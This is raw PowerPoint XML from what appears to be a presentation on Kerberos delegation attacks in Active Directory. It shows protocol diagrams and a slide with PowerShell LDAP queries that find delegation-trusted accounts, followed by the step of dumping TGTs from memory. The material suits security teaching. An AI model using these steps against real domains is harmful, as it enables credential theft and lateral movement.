          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AS_REQ (request TGT)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBBC2D70-F582-438D-9CD3-0F3DA7309D89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3031958" y="1018435"/>
            <a:ext cx="5221705" cy="1616481"/>
            <a:chOff x="3031958" y="1018435"/>
            <a:chExt cx="5221705" cy="1616481"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="54" name="Straight Arrow Connector 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DFC4EA1-6F7F-416E-93DC-65774BB1599A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3031958" y="1018435"/>
              <a:ext cx="5221705" cy="1616481"/>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8FF6679-51CA-4346-BC51-434245CCB870}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="4202687" y="1360887"/>
              <a:ext cx="3224108" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>KRB_ERR (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Preauth</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> required)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3056047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F8DA-BDA0-4B99-BBDB-13A6B9B12352}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unconstrained Delegation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31FD644D-6EE8-42AC-A7EF-648ED608B991}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Trust this computer for delegation to any service (Kerberos only)”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1) Find a server running a service with unconstrained delegation rights:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ADObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LDAPFilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:"(&amp;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>objectCategory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=computer)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>objectClass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ADObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LDAPFilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:"(&amp;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>objectCategory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=person)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>objectClass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=user)(userAccountControl:1.2.840.113556.1.4.803:=524288))“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2) ???</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3) Dump the TGTs out of memory and use them</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3712518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B12D-73FB-4444-B420-ADC8A8DDE30C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Constrained Delegation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4320F202-A1B1-4F08-9227-10B58AA4E6D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trust this computer for delegation to specified services only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use Kerberos only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use Any authentication protocol</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3837686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9D6B6B3C-A678-4484-A5C1-956772EBBE6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47064" y="188259"/>
            <a:ext cx="12062012" cy="662846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5125F58-6609-F147-9BE6-724F328E4510}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Protocol Transition</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F65EA6EB-68F8-429B-A7E5-64D6ABADBCD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2036453" y="1057025"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44A12586-5F11-48A7-9A21-AA54520F406D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8448890" y="745904"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A5CAAA-C8CF-49CC-9F3F-186E95C82D46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9229180" y="1038537"/>
            <a:ext cx="585218" cy="585218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EB8C559-BC4D-416C-AC0B-99642283F835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9957175" y="725282"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{366B0B42-8264-48E9-8A3E-294300102A6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2421056" y="877429"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D56AEB47-0CE5-4137-84B5-39C200A366C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9229180" y="627733"/>
            <a:ext cx="585242" cy="585242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Picture 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{375D4B21-E3E0-4658-BDC2-A1FBA3F38932}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079240" y="3227835"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Picture 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F71A077-574D-41A8-9262-753E2727C214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079240" y="2193086"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="42" name="Picture 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{841B6DC2-1588-4D79-8E5A-C7AA3647ADA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9336294" y="4323724"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43" name="Picture 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05E935F3-B697-403A-BCC3-99D65F8EF829}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8859744" y="4713869"/>
            <a:ext cx="585218" cy="585218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44" name="Picture 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB5BB2A9-FFC4-47E5-96CF-662738A41B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1664433" y="3154127"/>
            <a:ext cx="585242" cy="585242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{636E3B25-6DF4-413F-8F3A-98E90CF3FCC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9957175" y="1212241"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46" name="Picture 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D49D8368-059D-49ED-B859-A99B060563FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8902946" y="4323724"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48" name="Picture 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87E105EB-92E0-497B-9334-FAE52F467FF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6548504" y="3037295"/>
            <a:ext cx="758011" cy="873120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CECDF310-845F-40AB-87EF-977ACB9DC671}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3226530" y="1227401"/>
            <a:ext cx="5271247" cy="1682278"/>
            <a:chOff x="3045555" y="894026"/>
            <a:chExt cx="5271247" cy="1682278"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="6" name="Straight Arrow Connector 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56738D1F-B76C-4536-B27B-7C943090F787}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3045555" y="894026"/>
              <a:ext cx="5271247" cy="1682278"/>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BDC64F-C78C-4EC8-92F4-0CF83CDD26A4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="4193674" y="1405912"/>
              <a:ext cx="2743200" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AS_REQ (request TGT)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4050062-9873-4FB6-9F2B-AAC6AD8B777E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3377888" y="1639660"/>
            <a:ext cx="5190242" cy="1599172"/>
            <a:chOff x="3196913" y="1306285"/>
            <a:chExt cx="5190242" cy="1599172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="30" name="Straight Arrow Connector 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8B00F27-22F7-4069-9880-E02010ABAB1A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3196913" y="1306285"/>
              <a:ext cx="5190242" cy="1599172"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="0079D6"/>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D762194-1087-4543-A897-7D7E6180AB20}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="4344755" y="1717200"/>
              <a:ext cx="2743200" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AS_REP (receive TGT)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B47BF69-9B1F-44D1-A5DC-74CFCDDD8520}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3501511" y="1961012"/>
            <a:ext cx="5271247" cy="1682278"/>
            <a:chOff x="3320536" y="1627637"/>
            <a:chExt cx="5271247" cy="1682278"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="32" name="Straight Arrow Connector 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C1E303F-1C33-44AF-B398-A1E42D76C4D4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3320536" y="1627637"/>
              <a:ext cx="5271247" cy="1682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A76F2DF-CBB7-4F2C-8024-54C0BC93FD9E}"/>
                </a:ext>
